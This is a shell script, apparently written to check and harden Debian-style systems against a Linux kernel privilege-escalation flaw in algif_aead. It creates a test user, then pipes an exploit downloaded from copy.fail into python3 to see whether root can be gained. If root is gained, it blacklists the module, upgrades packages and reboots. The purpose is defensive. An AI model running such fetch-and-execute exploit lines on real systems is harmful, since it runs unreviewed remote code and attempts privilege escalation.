#!/usr/bin/sh # fix-copy-fail.sh - harden vs CVE-2026-31431, see: https://copy.fail # Copyright (c) 2026 Corwin Brust # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program. If not, see . # # # According to the website https://copy.fail (20262431@1pZ-5) # CVE-2026-31431 enables privlage escalation via exploitation # of a defect in the linux kernel intended to support a rarely # used (but typically enabled) kernel model, "algif_aead". # # This script grew from walking several dozen apt(1) virtual machines # and beneifited greatly from "peer" review and/or comments from the # FSF SYSOPS, irc://libera.chat/#emacs and other nerds/activists. thx # # more output. output is good. set -x # Delete the test user if it exists grep '^testu ' /etc/passwd && deluser testu; # NOTE: this make the script repeatable however # it will still abandon the 'testu' account # # To remove the test account after patching: # deluser testu # # Note this may not work all in one shot # due to the exploit screwing with the kernel # usermap resident in memory. adduser --disabled-password --gecos='""' testu \ && su testu -c 'cd; curl https://copy.fail/exp | python3 && su -c id' | grep root \ && echo "EXPLOIT DETECTED: copy.fail FFI, please see: https://copy.fail" \ && echo && echo "The system MUST be restarted before confirming the fix." && echo "If changes are made this should happen automatically but do it manually if that fails." && echo && echo "Pausing for ten seconds before attempting to fix.." && sleep 10 \ && echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf \ && rmmod algif_aead \ && apt-get update -y && apt-get upgrade -y && apt-get full-upgrade -y && shutdown -r now \ || echo "Check halted: check above for error messages.\n" \ "If the only error message you see if from grep you patched for copy.fail."